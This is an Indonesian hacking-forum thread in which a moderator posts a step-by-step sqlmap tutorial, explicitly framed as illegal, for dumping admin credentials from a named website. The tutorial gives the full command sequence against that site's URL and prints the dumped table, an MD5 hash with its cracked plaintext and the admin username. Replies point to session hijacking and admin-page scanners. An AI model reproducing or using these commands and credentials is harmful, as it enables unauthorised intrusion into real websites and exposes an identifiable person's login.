Indonesian SWF Editor Community
 
HomeRegisterLog in
SELAMAT Datang Di Cmonhackns ===> Mulailah dari yang kecil... karena semua yang besar dulunya juga kecil..

Share | 
 

 [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))

View previous topic View next topic Go down 
AuthorMessage
RieqyNS13
Moderator
Moderator
avatar

Jumlah posting : 379
Join date : 2011-01-16
Age : 20
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 3:43 am

~WARNING~
Threat dibawah ini berisi banyak gambar, jadi maklum kalo gambarnya banyak yg gak nampak, itu karena koneksi kalian lemot, dan buka kesalahan TS-nya

oke gan Wink Wink ...pada tutorial di cmonhack ini ane akan ngebahas gmana cara ngedapetin username dan password admin website secara illegal gan pke sqlmap yg dijalankan di Cygwin
untuk metode sql injection biasa, biasanya klo mw inject, malah forbidden, 404 Not Found,
contoh :
*agan nemuin site ug vuln,
SS :

*kan ada pesan errornya tuh web, tpi setelah agan masukin perintah +union+select+1,2,....12-- malah gak keluar tuh angka db nya, tpi web nya malah forbidden,


tpi klo pke metode yg ane share ini,..bisa aja nembus gan..hehe
summon faiznurfaza,

gak usah kakehan ngomong cuk.
0. download project sqlmap nya >> langsung download gan
1. download Cygwin nya di situs rersminya gan.
2. setelah selesai download, langsung install Cygwinnya..agan cuma perlu next, next, next, next , tapi pada bagian instalasi Select Packages, pastikan semuanya sudah terinstal ..


3. Setelah komponen Cygwin terinstall semua, buka Cygwin


*sebelum tahap selanjutnya, agan2 perlu mengenal command2 dalam Sqlmap seperti :

-u (URL TARGET)
--dbs (Mendapatkan DATABASE dalam suatu WEBSITE)
-D (Masuk kedalam DATABASE)
--tables (Memeriksa ada berapa TABLES didalam DATABASE suatu WEBSITE)
-T (Masuk kedalam TABLE)
--columns (Memeriksa ada berapa COLUMNS didalam TABLE suatu WEBSITE)
-C (Masuk kedalam COLUMNS)
--dump (Mengeluarkan isi dari COLUMNS)


4. setelah agan2 paham perintah2 nya, sekarang saatnya pengexploitan gan(gaya sitik) Very Happy
5. DAN jangan lupa, file sqlmap.gzip yg kita download tadi masih di Compress, jadi harus diExtract dulu ya Smile
saumpama ane extract di D:\cmonhack\sqlmap
SS:

---------------------------------------------------------------------------------------------------------
--Tahap Exploiting--


target inject = [You must be registered and logged in to see this link.]

1. Di Cygwin, tulis perintah untuk masuk ke Direktory dimana kita tadi menyimpan file download sqlmap.gzip yg telah kita extract ..
saumpama kita Extract di D:\cmonhack\sqlmap, jadi di Cygwin kita hrus masukin perintah :
Code:
cd D:\cmonhack



2. Trus setelah itu, kita masukkan lagi
Code:
cd sqlmap


3. Dan kita sudah masuk direktory sqlmap nya..
di dalam folder D:\cmonhack\sqlmap, yg kita pakai untuk exploiting adalah file sqlmap.py nya..

4. Jika Cygwin sudah masuk ke Direktory sqlmapnya, selanjutnya di Cygwin kita tulis perintah seperti :
Code:
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 --dbs

database :
[*] information_schema
[*] stirlin1_heritage


5. Kita temukan 2 database seperi gambar di atas, tpi kita gunakan adalah database stirlin1_heritage

6. Proses selanjutnya, kita masukkan perintah seperti ini :
Code:
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -D stirlin1_heritage --tables


dan hasilnya akan seperti ini :

itu adalah semua table yg telah dikumpulkan oleh om sqlmap.. Very Happy Very Happy

7. Selanjutnya, kita akan melihat isi column dari salah satu table yaitu table access dengan perintah seperi berikut :
Code:
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -T access --columns


8. Terdapat 2 buah Colum pada table access yaitu pass dan user seperti gambar di atas
+--------+----------+
| Column | Type |
+--------+----------+
| pass | tinytext |
| user | tinytext |
+--------+----------+



9. Langkah selanjutnya, kita lakukan dump ke column pass dan user, dgn cara :
Code:
./sqlmap.py -u http://www.heritageaustralia.com.au/news.php?id=267 -T access -C user,pass --dump


di situ, kita di suruh masukin perintah Y atau n atau q, masukin aja perintah Y trus Enter

10. Setelah di Enter, maka akan ada pesan kaya gini :
Code:
what's the dictionary's location? [/cygdrive/d/cmonhack/sqlmap/txt/wordlist.txt]


klik Enter aja

11. Lalu muncul lagi pesan

Code:
do you want to use common password suffixes? (slow!) [y/N]
masukin y trus Enter lagi

12. Trus tunggu sampai Proses BruteForce nya selesai 100%


13. Kalau dah selesai 100 persen, maka hasilnya akan seperti ini :
+----------------------------------+------------------------+
| pass | user |
+----------------------------------+------------------------+
| 6b92c50ef6dad109cada972ececead9b | Ros Stirling |
+----------------------------------+------------------------+




14. Ternyata bruteforce dri om sqlmap blum bisa decrypt password MD5 nya om, klo gitu, kita gunian MD5 Decrypter Online di [You must be registered and logged in to see this link.]
ternyata ketemu gan :
6b92c50ef6dad109cada972ececead9b : secure55bm


15. Skarang tinggal cari admin login nya om >> [You must be registered and logged in to see this link.]

tinggal masukin user dan password nya doank gan :

user : Ros Stirling
pass : secure55bm


Kesimpulannya, jika kita make teknik sql injection biasa,,maka memungkin tidak akan berhasil dalam menjalankan attacking, karena bisa saja akan menemui forbidden atau 404 not found di web nya, tpi jika kita pke sqlmap di cygwin, selain mudah dan praktis, web2 yg forbidden ato 404 not found tadi bisa di tembus

Have FUn gan



CREDIT : RieqyNS13

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
Xenobors
Warga Lama
Warga Lama
avatar

Jumlah posting : 137
Join date : 2011-05-12
Lokasi : Di Dalem WC

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 5:47 am

Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?
Back to top Go down
cleon
Sesepuh
Sesepuh
avatar

Jumlah posting : 336
Join date : 2011-04-19
Age : 20
Lokasi : Idung PATRICK !

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 11:03 am

wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?
Back to top Go down
RieqyNS13
Moderator
Moderator
avatar

Jumlah posting : 379
Join date : 2011-01-16
Age : 20
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 1:19 pm

cleon wrote:
wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?
hrus disisipi cookie dulu gan, alias session hijacking

Xenobors wrote:
Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?
scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
cleon
Sesepuh
Sesepuh
avatar

Jumlah posting : 336
Join date : 2011-04-19
Age : 20
Lokasi : Idung PATRICK !

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 1:32 pm

RieqyNS13 wrote:
cleon wrote:
wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?
hrus disisipi cookie dulu gan, alias session hijacking

Xenobors wrote:
Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?
scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

oke''
tapi kok pas instal jadi lemot koneksiku ?
Back to top Go down
Ryan San Rakagi
Moderator
Moderator
avatar

Jumlah posting : 260
Join date : 2011-04-19
Age : 22
Lokasi : CIREBON

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 1:36 pm

RieqyNS13 wrote:
cleon wrote:
wah makin menggila aja nie orang
yg kemaren aja uda macet'' sekarang beginian
oke semangat

mau tanya nih, caranya biar kita tau tempat loginnya gmana?
hrus disisipi cookie dulu gan, alias session hijacking

Xenobors wrote:
Gan ini hanya bisa digunakan untuk menembus website saja ato bisa digunakan untuk yg lain seperti FB ato lainnya ?
scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

Wah Cool Abis Neh Gan Btw

Bisa" Neh ID MIMIN CMON Bisa" Kna Juga Neh

Jadi Ngeri Neh Gan Kalo Dibayangin

_________________
BERTEMU LAGI DENGAN SAYA
YAITU ORANG GANTENG PENUH POTENSI DAN KHARISMA YANG SANGAT MENGGAIRAHKAN


YAITU: RYAN'Z SAN RAKAGI






ADD MY FACEBOOK




Back to top Go down
http://nesaz.lifeme.net
Crusher
Moderator
Moderator
avatar

Jumlah posting : 1158
Join date : 2011-04-26
Age : 104
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 1:45 pm

ga akh males coba,cara jumping aja udah puyeng apa lagi ini,jumping belum apa apa udah langsung masuk backdoor

_________________
Gw tahu lo maho

yang sabar ya gan

jika belum sembuh silahkan Hubungi Operator Axis

Iklan ini di persembahkan oleh :

Back to top Go down
RieqyNS13
Moderator
Moderator
avatar

Jumlah posting : 379
Join date : 2011-01-16
Age : 20
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 2:08 pm

Ryan San Rakagi wrote:
RieqyNS13 wrote:

hrus disisipi cookie dulu gan, alias session hijacking


scan dulu pke acuneix, klo mw yg gratis, pke aja nikto..ato pke admin finder perl

Wah Cool Abis Neh Gan Btw

Bisa" Neh ID MIMIN CMON Bisa" Kna Juga Neh

Jadi Ngeri Neh Gan Kalo Dibayangin

tergantung om, klo server database cmonhack berada di komputernya om mimin sendiri, bisa di cari celahnya trus diexploiting om, tpi klo server cmonhack gak di komputernya om mimin, tpi di webserver kaya [You must be registered and logged in to see this link.] kita akan kesulitan om elephant

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
Crusher
Moderator
Moderator
avatar

Jumlah posting : 1158
Join date : 2011-04-26
Age : 104
Lokasi : Di Naruto.Lagi perang

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 2:59 pm

Thread Move to Computer Freakz All About Software By Kurohige

_________________
Gw tahu lo maho

yang sabar ya gan

jika belum sembuh silahkan Hubungi Operator Axis

Iklan ini di persembahkan oleh :

Back to top Go down
RieqyNS13
Moderator
Moderator
avatar

Jumlah posting : 379
Join date : 2011-01-16
Age : 20
Lokasi : chmod 0655 GetConfig.SQL

PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   Wed Dec 28, 2011 4:02 pm

Kurohige wrote:
Thread Move to Computer Freakz All About Software By Kurohige

hehe,,makasih gan, klo seandainya ada subforum hacking for dummies, ane taruh di situ aja gan

_________________
403 Forbidden
Back to top Go down
http://rieqyns13.net
Sponsored content




PostSubject: Re: [tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))   

Back to top Go down
 
[tutor] SqlMap (advanced sql injection) di Windows dgn Cygwin :))
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» windows 8 core i5
» Scid vs Pc 4.5 (windows beta) is available
» Installing Train Sim Modeller on Windows 7 64 bit.
» GTL2008 in Windows 7
» The Crazy Bishop for free on Windows 8!

Permissions in this forum:You cannot reply to topics in this forum
cmonhackns.n-stars.org :: Computer Freakz :: All About Software-
Jump to: